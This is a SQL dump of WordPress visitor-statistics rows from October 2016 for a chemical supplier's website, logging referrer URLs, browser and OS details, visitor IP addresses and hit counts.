INSERT INTO `wp_statistics_visitor` VALUES (4280, '2016-10-14', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '192.126.162.134', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4281, '2016-10-14', 'https://www.miller-stephenson.com', 'libwww-perl', 'Unknown', '6.05', '', '195.154.184.219', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4282, '2016-10-14', 'https://kinocccp.net/', 'MSIE', 'Windows', '6.0', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4283, '2016-10-14', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjakMP0q9vPAhVIWSYKHd-HAXIQFggyMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Ffluoropolymer-coatings%2F&usg=AFQjCNF91v0e38EeCtikc6JGJsX3NDodJw&sig2=XJVl-H5wlO5DdNuLYkRLdg&bvm=bv.135974163,d.eWE', 'MSIE', 'Windows', '11.0', '', '107.3.95.149', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4284, '2016-10-14', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '25.0', '', '172.16.104.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4285, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4286, '2016-10-14', 'https://www.miller-stephenson.com/miller/news.html', 'MSIE', 'Windows', '9.0', '', '180.153.187.188', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4287, '2016-10-14', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/ptfe-dryfilm-lubricants/', 'MSIE', 'Windows', '9.0', '', '180.153.187.59', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4288, '2016-10-14', 'https://www.miller-stephenson.com/miller/contact.html', 'MSIE', 'Windows', '9.0', '', '180.153.187.150', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4289, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '130.20.65.155', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4290, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.95.37.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4291, '2016-10-14', 'https://www.bing.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '128.174.133.219', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4292, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.49.204.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4293, '2016-10-14', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.61.163.65', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4294, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '184.168.193.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4295, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4296, '2016-10-14', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '47.0.2526.111', '', '199.168.97.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4297, '2016-10-14', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '47.89.47.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4298, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '198.71.230.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4299, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '103.251.228.8', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4300, '2016-10-14', 'https://www.google.com.au/', 'Chrome', 'Linux', '53.0.2785.143', '', '182.239.223.51', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4301, '2016-10-14', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '162.144.35.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4302, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '69.250.147.214', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4303, '2016-10-14', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '28.0.1500.95', '', '54.87.224.59', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4304, '2016-10-14', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjQxfylwNvPAhUGfiYKHXbzCTYQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=SaJb-jgSRCMJzxLMTbepVQ&bvm=bv.135974163,d.cWw', 'MSIE', 'Windows', '11.0', '', '96.86.79.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4305, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '195.238.172.150', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4306, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '7.0', '', '199.255.138.41', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4307, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '74.217.90.250', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4308, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '74.217.90.250', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4309, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '74.217.90.250', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4310, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.116.9.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4311, '2016-10-15', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '24.193.212.151', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4312, '2016-10-15', 'https://www.google.com.mx', 'Firefox', 'Windows', '45.0', '', '189.214.97.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4313, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '69.163.152.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4314, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '14.0.1', '', '69.58.178.58', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4315, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '63.117.208.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4316, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '64.71.32.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4317, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4318, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4319, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.190.10.127', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4320, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4321, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '75.129.150.124', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4322, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.190.14.247', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4323, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '103.13.97.137', '000', 47, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4324, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4325, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4326, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '28.0.1500.95', '', '54.164.35.71', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4327, '2016-10-15', 'https://www.google.co.kr/', 'Chrome', 'Windows', '54.0.2840.59', '', '1.233.30.125', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4328, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '47.0', '', '104.34.127.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4329, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '176.31.39.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4330, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '38.0', '', '104.239.198.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4331, '2016-10-15', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '68.197.199.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4332, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '139.226.2.202', '000', 47, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4333, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '3.0.195.21', '', '52.50.187.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4334, '2016-10-15', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '73.93.125.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4335, '2016-10-15', 'https://www.miller-stephenson.com/terms-conditions/', 'MSIE', 'Windows', '9.0', '', '182.118.20.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4336, '2016-10-15', 'https://www.miller-stephenson.com', 'Drupal', 'Unknown', 'Unknown', '', '23.253.170.86', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4337, '2016-10-15', 'https://www.miller-stephenson.com', 'Apache-HttpClient', 'Unknown', 'UNAVAILABLE', '', '24.130.144.242', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4338, '2016-10-15', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '70.44.1.142', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4339, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '3.6.8', '', '107.20.220.83', '000', 54, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4340, '2016-10-15', 'https://www.bing.com/search?q=opteon+sion&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4341, '2016-10-15', 'https://www.miller-stephenson.com/product/sion/', 'MSIE', 'Windows', '9.0', '', '204.79.180.209', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4342, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.22', '', '117.25.127.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4343, '2016-10-15', 'https://mmk.mschem.com/', 'Opera', 'Windows', '12.16', '', '113.77.87.166', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4344, '2016-10-15', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiI-umA4tvPAhXXPYEKHW1KDNUYABAA&sig=AOD64_0ke6e4sNtXr8Rh-mQmhW8d4L-o5Q&rct=j&q=&ved=0ahUKEwjvweSA4tvPAhVLQSYKHWxrDywQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '142.197.197.37', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4345, '2016-10-15', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4346, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.121', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4347, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '39.0', '', '70.69.110.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4348, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '24.130.144.242', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4349, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '2600:100c:b015:8c3a:0:4a:b1a8:3f01', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4350, '2016-10-15', 'https://www.miller-stephenson.com', 'YisouSpider', 'Unknown', 'Unknown', '', '42.156.139.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4351, '2016-10-15', 'https://www.google.com.pg/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjJ3u_37NvPAhVHjlQKHd72BpsQFggZMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '130.76.24.24', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4352, '2016-10-15', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '158.69.154.43', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4353, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '69.59.67.120', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4354, '2016-10-15', 'https://www.bing.com/search?q=krytox+ts4&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4355, '2016-10-15', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-ts4/', 'MSIE', 'Windows', '9.0', '', '204.79.180.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4356, '2016-10-15', 'https://pokemongo-all-news.ru/', 'MSIE', 'Windows', '6.0', '', '46.118.155.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4357, '2016-10-15', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '47.0.2526.111', '', '199.168.97.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4358, '2016-10-15', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '38.133.89.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4359, '2016-10-15', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '534', '', '199.30.16.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4360, '2016-10-15', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '99.31.189.7', '000', 27, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4361, '2016-10-15', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '99.47.217.120', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4362, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.14.199.144', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4363, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.14.199.79', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4364, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.14.199.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4365, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '5.0', '', '198.251.94.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4366, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '198.251.94.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4367, '2016-10-15', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '5.0', '', '198.251.94.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4368, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.1.6', '', '198.251.94.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4369, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '11.3.6', '', '198.251.94.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4370, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4371, '2016-10-15', 'https://www.google.ca/', 'Safari', 'iPhone', '10.0', '', '50.92.66.235', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4372, '2016-10-15', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.7.0', '', '216.243.77.196', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4373, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '80.187.109.40', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4374, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '10.0.3', '', '216.243.77.196', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4375, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '14.97.23.35', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4376, '2016-10-15', 'https://www.spacetechexpo.com/visit/exhibitor-list-2016', 'Firefox', 'Windows', '49.0', '', '71.251.156.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4377, '2016-10-15', 'https://www.miller-stephenson.com/krytox/', 'Chrome', 'Android', '53.0.2785.124', '', '70.213.5.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4378, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '21.0', '', '46.229.173.131', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4379, '2016-10-15', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '5.1', '', '46.229.173.131', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4380, '2016-10-15', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '46.229.173.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4381, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4382, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4383, '2016-10-15', 'https://1-free-share-buttons.com', 'Chrome', 'Windows', '36.0.1985.143', '', '117.247.199.77', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4384, '2016-10-15', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.112.23', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4385, '2016-10-15', 'https://www.miller-stephenson.com/products/detail.aspx?ItemId=38', 'MSIE', 'Windows', '9.0', '', '182.118.20.236', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4386, '2016-10-15', 'https://ttsgco.blogfa.com/', 'Opera', 'Unknown', '12.16', '', '1.39.37.21', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4387, '2016-10-15', 'https://www.miller-stephenson.com/products/detail.aspx?ItemId=65', 'MSIE', 'Windows', '9.0', '', '182.118.20.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4388, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4389, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '93.159.230.88', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4390, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '183.15.7.19', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4391, '2016-10-15', 'https://www.google.co.th/', 'Chrome', 'Windows', '53.0.2785.143', '', '49.231.232.34', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4392, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '204.14.86.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4393, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '20.0', '', '204.14.86.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4394, '2016-10-15', 'https://www.google.nl/', 'Firefox', 'Windows', '49.0', '', '88.211.139.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4395, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '106.39.193.123', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4396, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '26.0.1410.65', '', '52.70.48.63', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4397, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.38.202.150', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4398, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.135.1.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4399, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.213', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4400, '2016-10-15', 'https://www.google.be/', 'Chrome', 'Windows', '53.0.2785.143', '', '81.243.153.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4401, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4402, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.139', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4403, '2016-10-15', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&uact=8&ved=0ahUKEwiijpmOvtzPAhVDwGMKHRoMBCYQFghSMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA&sig2=o9oKRkUvxyuFHoTA2iDE2Q&bvm=bv.135974163,d.cGc', 'MSIE', 'Windows', '11.0', '', '47.144.162.102', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4404, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '7.0', '', '199.255.138.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4405, '2016-10-15', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '160.20.8.61', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4406, '2016-10-15', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '151.28.94.23', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4407, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '123.30.129.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4408, '2016-10-15', 'https://www.google.com.br/', 'Safari', 'iPhone', '600.1.4', '', '177.79.78.149', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4409, '2016-10-15', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCQQFjAD&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Fkrytox-lubricants%2F&ei=hf4BWNGBEquUH8y0AQ&usg=AFQjCNFJMcZt6xCpXzcHAOYSpI7Q31y8hg', 'Chrome', 'Android', '44.0.2403.133', '', '66.249.88.156', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4410, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.36.108.177', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4411, '2016-10-15', 'https://www.google.co.in/', 'Firefox', 'Windows', '50.0', '', '115.248.70.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4412, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4413, '2016-10-15', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.182', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4414, '2016-10-15', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '124.176.54.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4415, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '54.70.94.117', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4416, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.76', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4417, '2016-10-15', 'https://mmk.mschem.com/', 'Opera', 'Windows', '12.16', '', '119.128.172.172', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4418, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '24.0.1290.1', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4419, '2016-10-15', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.222.174.210', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4420, '2016-10-15', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'MSIE', 'Windows', '10.0', '', '199.89.130.52', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4421, '2016-10-15', 'https://www.miller-stephenson.com/product/epon-828/', 'MSIE', 'Windows', '11.0', '', '131.137.245.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4422, '2016-10-15', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.190.193.242', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4423, '2016-10-15', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '71.12.204.119', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4424, '2016-10-15', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.69', '', '121.189.37.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (4425, '2016-10-15', 'https://www.google.az/', 'Chrome', 'Windows', '53.0.2785.143', '', '178.237.69.167', '000', 2, 0); 
